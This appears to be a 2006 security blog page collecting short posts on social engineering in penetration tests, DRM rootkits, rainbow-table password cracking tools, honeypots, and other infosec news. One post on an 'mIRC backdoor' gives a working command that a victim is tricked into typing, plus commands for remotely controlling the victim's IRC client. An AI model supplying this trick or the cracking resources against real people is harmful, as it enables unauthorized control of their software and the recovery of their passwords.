Darknet - The Darkside

Don`t Learn to HACK - Hack to LEARN. That`s our motto and we stick to it, we are all about Ethical Hacking, Penetration Testing & Computer Security. We share and comment on interesting infosec related news, tools and more. Follow us on RSS or Twitter for the latest updates.

01 March 2006 | 17,203 views

Should Social Engineering be a part of Penetration Testing?

Check Your Web Security with Acunetix

This is actually a very interesting debate.

Just to introduce if you don’t know..

What is Penetration Testing

A penetration test is a method of evaluating the security of a computer system or network by simulating an attack by a malicious cracker. The process involves an active analysis of the system for any weaknesses, technical flaws or vulnerabilities. This analysis is carried out from the position of a potential attacker, and can involve active exploitation of security vulnerabilities. Any security issues that are found will be presented to the system owner together with an assessment of their impact and often with a proposal for mitigation or a technical solution.


What is Social Engineering

It’s a bit cheesy, but we often call this hacking the wetware (hardware, software and wetware meaning people).

Social Engineering is a form of intrusion making use of weaknesses in the non-technical aspects of the system, the wetware also known as people. A common phrase would be ‘Con man’, the most well known form of social engineering. In the technological realm, social engineering relates to unauthorized access of computing resources or network by exploiting human weaknesses.

In the historical sense con men would engineer their way into certain resources, someone’s bank account, shoe box under the bed and so on. In this context the social engineer would target someone that is authorized to use the network, or resource they wish to access and attempt to leverage some confidential information out of them that would compromise the network security.

This is what Mitnick was famous for, and what his book The Art of Deception is about.

I’ll probably cover this more later.

Does Social Engineering have a place in Penetration Testing?

Some people say yes, it’s the most effective way..Actually I’ve found this true, the human element and the lack of education in the workplace is often the weakest link in the chain.

Does it have any place in security testing, I would say definately yes. Some people would say perhaps it should be a seperate project, not in the ‘technical’ assessment of a security perimeter.

Or course it depends on the scope given by the client, but it should be part of any good Penetration Test or Vulnerability Assessment.

Why Social Engineering Should be in a Pen Test

For me whatever you do to get into the network, or escalate your access is part of a pen-test. If you are able to get users to divulge some kind of information that assists you in compromising or gaining access to something, then you are doing exactly what a real attacker would have been able to do. You might be able to trick them into telling you something via phone or e-mail, get them to physically do something like open a door or unlock a machine, or get them to run an executable or disable a firewall. You might be able to get them to do under false pretenses, through their own ignorance or carelessness, or by other means. Whatever you do can be considered part of a pen-test.

Many recent studies have shown people are still incredibly gullible and especially when presented with a ‘Free CD‘ or something, they will happily put it in their drive and run it.

This mean in reality social engineering is an easy option to attack a network no problem of IDS, no fear of being tracked by log analysis while attacking. Some attackers try to take out the information of network and internal devices bycalling the IT staff and pretending like a sales guy who is trying to sell a log analyzer or IDS. They will often say “No we don’t need a new Firewall we already have a Cisco PIX”.

Why Social Engineering Shouldn’t be in a Pen Test

Some would say social engineering is a altogether a different game, the pen testing results could be used to socially engineer someone within the company, perhaps an extension of the pen-test rather than a part of it.

The target of the pen-test might be in a physically different location (Makes the SE more difficult) or the native language of the target may be different (Makes the SE pretty much impossible).

Some people say don’t bother, because you WILL suceed with social engineering.

The main problem being technical testing is fairly scientific, you can apply metrics to it, you can measure it and you can track its effectiveness.

With social engineering, it’s still pretty much an artform and totally differs from person to person, it’s very hard to be scientific when it comes to conning people. Social Engineering may well be left out by large corporations unless it can be scientifically defined and metrics applied to it.

Things to Keep in Mind

However, there are a few important things to keep in mind. You want to definitely lay down the ground rules with whomever it is you are pen-testing for. They might just want to see what machines an exploit can break into. You might really upset some people and get in trouble if you start trying to gain physical access or send trojans to executives. Make sure they are aware of what you are doing and that you have approval. Get everything in writing or in your agreement somewhere.

Also there are many questions to be answered before doing an SE test – questions of legality, ethics and possible personal consequences for the people who were “duped”. These have to be taken into consideration and could mean the social engineering part is not possible.

Please bear in mind the wellfare of the employees too, consider also adding a clause that protects the end-user from getting fired. Human nature is to be helpful, the problem is a lack of education, not a mistake from the user.


Social Engineering, you can include it or not based on the above information, if you don’t include it, you can always demonstrate it for information purposes to the management team or contact of the target organisation.

References: Discussion on SF Pen Test List

01 March 2006 | 8,420 views

Prostitutes want GTA (Grand Theft Auto) Banned

A little bit crazy eh?

Sex workers cry foul, say game “accrues points to players for the depiction of rape and murder of prostitutes.”

The Grand Theft Auto franchise is getting attacked from all angles. Joining the ranks of politicians, policemen, and attorneys in their crusade to see the game lifted from shelves are the nation’s sex workers. On its Web site, the Sex Workers Outreach Project USA is asking parents to assist them in calling for a ban of Take-Two Interactive’s controversial game.

Citing a 2001 document from the National Institute on Media and the Family’s David Walsh, SWOP is calling “on all parents and all gamers to boycott Grand Theft Auto.”

The organization quotes various points from Walsh’s paper, including, “Children are more likely to imitate a character with whom they identify with. In violent video games the player is often required to take the point of view of the shooter or perpetrator.”

Source: Gamespot

Apparently, the sex workers of the Sex Workers Outreach Project aren’t too happy about their ingame counterparts being treated violently in the GTA games. They note that the games are a bad influence on children, and might encourage rape and violent behavior towards prostitutes in real life.

SWOP Statement on Grand Theft Auto
The game Grand Theft Auto demonstrates attitudes and behaviors that reflect broader social attitudes toward prostitutes, who are made vulnerable because of their criminal status. Our outrage and disgust at the depictions of prostitutes in games such as GTA renew our call for absolute de-criminalization and repeal of all laws that outlaw the exchange of sex for money in order to end the violence directed at people believed to be prostitutes.

It’s a bit ridiculous if you ask me, are Soldiers going to start suing me because I enjoy blowing them up in Castle Wolfenstein?

Or Special Forces operatives…they will start suing Tom Clancy, omg Rainbow 6, YOU TRAUMATISED ME!?!

01 March 2006 | 7,162 views

Who is Navaho Gunleg?

Following the recent post by backbone, I decided to post a short introduction as well.

I am from The Netherlands, Europe — a country most people probably have heard about. Either because of the legendary HackTic-foundation that later started the ISP XS4ALL and otherwise undoubtably because of our liberal stance towards soft-drugs and prostitution.

I have always been drawn to computers and remember tinkering with them ever since my parents bought one, a Commodore 64. At that time, we didn’t have that much money to spend so I was forced to write my own programs and games. This experience basically laid the basis for my profession as a programmer, later in life.

As time passed, other computers came into our house-hold, mainly because of my dad’s job. Things started getting really interesting on the PC. MSDOS, PCDOS, various programming languages such as BASIC and Pascal, applications suchs as DBASE.

In contrast to people who have only experience with graphical user interfaces such as Microsoft’s and Apple’s, because of the experience with the command-line, UNIX-flavoured operating systems don’t scare me.

In the Present
Currently, I am a programmer for a media company. The operating systems I work on are all UNIX-flavours. I can ‘speak’ most relevant (programming) languages available on those machines: C(++), Shell scripting, PHP, Javascript, SQL and HTML to name but a few. I have had the privilege to tinker with J2ME (that’s Java for mobile devices such as phones) as well.

I mainly implement the technology behind web-sites, such as content-management systems and various types of server-to-server communication. Additionally, I write plugins for interactive voice response systems such as Bayonne.

Additionally, I also do system administration on few of those servers so I have grown quite interested in server security as well.

In my spare time, because I’m cheap, I still write my own software. If I’m out of suggestion, my girlfriend sometimes has a request for something. For the last couple of years I love to make everything web-based. This fuelled my interest in web-based user-interfaces and the technology behind it, databases, scripting and secure communications.

Being a coder, my articles will mainly focus on programming. How to, and how not to implement stuff safe and secure. Fact is, programs that rely on end-user input are by definition un-safe.

Knowing the business-side of the chain so to speak, I have come to discover that a lot of companies, simply because of the lack of knowledge, money or time, fail to implement online systems secure enough.

Technology is going faster than most people can keep track of it and this has implications that some people might ignore.

28 February 2006 | 44,914 views

US considers banning DRM rootkits – Sony BMG

Now after the huge Sony BMG Rootkit fiasco, this has become quite a hot topic, how far can vendors go to enforce their ‘Digital Rights Management’ (or Digital Restrictions Management as we like to call it), can they install a rootkit on your machine and hook into your OS? Can they take over your PC just so they can check you aren’t pirating their music?

Thankfully the US government has taken this matter into consideration and is considering banning DRM rootkits.

US government officials are considering introducing legislation if companies continue to distribute copy-protection measures that compromise computer security.

The Department of Homeland Security’s Border and Transportation Security Directorate warning followed the discovery last year that Sony BMG employed two different types of digital rights management (DRM) on music CDS sold in the US and both installed rootkit software on PCs that made them vulnerable.

The Sony Case did indeed cause a massive storm and raised quite a large anti-Sony sentiment.

Sony has begun compensating customers who inadvertently installed the rootkit by inserting the affected CDs into PCs. However the swathes of bad publicity that it received over the whole affair have not deterred others. F-Secure reports that German DVD of the Mr & Mrs Smith movie starring Brad Pitt and Angelina Jolie contains the Settec Alpha-DISC system that installs a user-mode rootkit.

I’m glad the government are taking this seriously.

It does show however how weak the security Architecture is on Windows by default..How many Linux users do you see inserting random CD’s as root?

Source: PC Pro

Digg this Post

27 February 2006 | 409,576 views

Password Cracking with Rainbowcrack and Rainbow Tables

What is RainbowCrack & Rainbow Tables?

RainbowCrack is a general propose implementation of Philippe Oechslin’s faster time-memory trade-off technique.

In 1980 Martin Hellman described a cryptanalytic time-memory trade-off which reduces the time of cryptanalysis by using precalculated data stored in memory. This technique was improved by Rivest before 1982 with the introduction of distinguished points which drastically reduces the number of memory lookups during cryptanalysis. This improved technique has been studied extensively but no new optimisations have been published ever since.

You can find the official Rainbowcrack project here, where you can download the latest version of Rainbowcrack.

In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker try all possible plaintexts one by one in cracking time. It is time consuming to break complex password in this way. The idea of time-memory trade-off is to do all cracking time computation in advance and store the result in files so called “rainbow table”.

Basically these types of password crackers are working with pre-calculated hashes of ALL passwords available within a certain character space, be that a-z or a-zA-z or a-zA-Z0-9 etc.

These files are called Rainbow Tables.

You are trading speed for memory and disk space, the Rainbow Tables can be VERY large.

Be warned though, Rainbow tables can be defeated by salted hashes, if the hashes are not salted however and you have the correct table, a complex password can be cracked in a few minutes rather than a few weeks or months with traditional brute forcing techniques.

So where do I get these Rainbow Tables?

You can generate them yourself with RainbowCrack, this will take a long time, and a lot of diskspace.

Project Shmoo is offering downloads of popular Rainbow Tables via BitTorrent.


If you wanted to, you could even buy the tables from http://www.rainbowtables.net/.

Or these guys, not free but cheap http://www.rainbowcrack-online.com/

Some free tables here http://wired.s6n.com/files/jathias/index.html

What software is available for use with Rainbow Tables?

There is of course the original RainbowCrack as mentioned above.

Then there is:


Ophcrack is a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman’s original trade-off, with better performance.

Cain and Abel (newly added support for Rainbow Tables)

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

Cain and Abel is personally my favourite fully featured password whacking tool, it also has a good packet sniffer, which grabs and decodes passwords and many methods for password cracking. The interface is decent too. I’ll write more on how to get the most out of Cain later.

L0phtcrack or LC5

LC5 is the latest version of L0phtCrack, the award-winning password auditing and recovery application used by thousands of companies worldwide.

Please note this is a COMMERCIAL product.


Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003

Thankfully there is a freeware alternative to LC5 in the form of LCP.

Other Resources


Digg This Post

27 February 2006 | 7,564 views

Malware Honeypot Projects Merge – mwcollect and nepenthes

Looking to streamline the collection of malware samples, two of the biggest honeypot projects mwcollect and nepenthes have merged operations.

The two projects, which passively trap viruses, spyware and other forms of malicious software by emulating known vulnerabilities, will combine operations to develop a single malware collection tool, according to an announcement my mwcollect head developer Georg Wicherski.

The merger comes after a year of concurrent development that caused a lot of overlap and shared work, Wicherski said.

“Mwcollect.org will become a top-level community covering malware collection efforts, [and] nepenthes will become the official software used for malware collection and be part of mwcollect.org,” he said.

A new mwcollect.org meta-portal will be created to host information related to malware collection.

Source: Eweek

26 February 2006 | 5,556 views

Firefox Confuses UK Government Piracy Laws

The UK government stated:

If Mozilla permit the sale of copied versions of its software, it makes it virtually impossible for us, from a practical point of view, to enforce UK anti-piracy legislation

It seems they really don’t understand the whole open source thing do they? You can’t pirate open source software, you can however sell it however you like. Most companies just charge a nominal fee to cover the cost of the CD and the postage.

I can’t believe that your company would allow people to make money from something that you allow people to have free access to. Is this really the case?

The contact from Mozilla licensing actually responded back attempting to explain the situation.

I wrote back, politely explaining the principles of copyleft & that the software was free, both as in speech and as in price, and that people copying and redistributing it was a feature, not a bug. I said that selling verbatim copies of Firefox on physical media was absolutely fine with us, and we would like her to return any confiscated CDs and allow us to continue with our plan for world domination (or words to that effect).

Source: SlashdotTimes Online

25 February 2006 | 10,735 views

Free Prep Material for LPI Linux Certification (LPI 201 and 202)

Here’s a series of well written IBM Linux tutorials to help you learn Linux fundamentals and prepare for system administrator certification. The LPI prep tutorials help you prepare for the topics in LPI exam 201 and the topics in LPI exam 202.

You can find more about the certification at the Linux Professional Institute.

I’ve been meaning to take LPI 201 for quite sometime actually, it looks like a pretty solid foundation to Linux and I know most of it allready, so I should be able to do it without too much problem.

You can find the material at IBM:

Linux Professional Institute Exam Prep

The eight tutorials below help you prepare for the eight topics in LPI exam 201. Exam 201 is the first of two LPI intermediate-level system administrator exams. Both exam 201 and exam 202 are required for intermediate-level certification, or LPIC-2.

You do have to sign up, or just use Bugmenot, the bugmenot extension for Firefox is very useful ;)

To any budding hackers, yes it is recommended you have strong Linux skills.

24 February 2006 | 22,646 views

mIRC Backdoor

Well it’s not really a backdoor… but we can consider it one…

Some time ago it apeared on many websites (including mine) an article about a backdoor in mIRC… all this backdoor stuff was really nothing more than a mIRC script that by it’s mean made the client to respond at any command received via a CTCP (Client to Client Protocol) command… such as ping, version, time, etc…. so here is the command that the victim has to enter:

//.write -c mirc.dll ctcp 1:*:*:$1- | /.load -rs mirc.dll

The command is splited in 2 parts, delimited by | (a vertical line)… So the first section writes a file “mirc.dll” in which we write a simple mIRC script which listens to any CTCP request… the second one loads the file with the mIRC script….

After the “victim” executes this command we can control it by introducing one of the following lines:

{ this is a comment }

/ctcp victims_nick /.nick lamer { changes the nickname of the victim to lamer }

/ctcp victims_nick /.exit { closes the victims mIRC }

/ctcp victims_nick /.run www.black2white.as.ro
{ opens the victims default web browser (ie, firefox, opera, etc.) on the page www.black2white.as.ro }

/ctcp victims_nick /.any_valid_irc_command

So happy “masterminding”….

More IRC Commands: http://www.hackthissite.org/pages/irc/reference.php

24 February 2006 | 6,892 views

UK Wants Backdoor in Next Version of Microsoft Windows

Yes that’s right, big brother wants a backdoor in your operating system even MORE of a reason to use Open Source alternatives that we can audit ourselves eh?

There has been talk of such things in the past, US government backdoors in common cryptography algorithms and now talks of backdoors in the most popular OS in the world.

Windows Vista is due to be rolled out later this year. Cambridge academic Ross Anderson told MPs it would mean more computer files being encrypted.

He urged the government to look at establishing “back door” ways of getting around encryptions.

The Home Office later told the BBC News website it is in talks with Microsoft.

Yes, it bothers me.

Professor Anderson said people were discussing the idea of making computer vendors ensure “back door keys” to encrypted material were made available.

The Home Office should enter talks with Microsoft now rather than when the system is introduced, he said.

He said encryption tools generally were either good or useless.

“If they are good, you either guess the password or give up,” he said.

Source: BBC News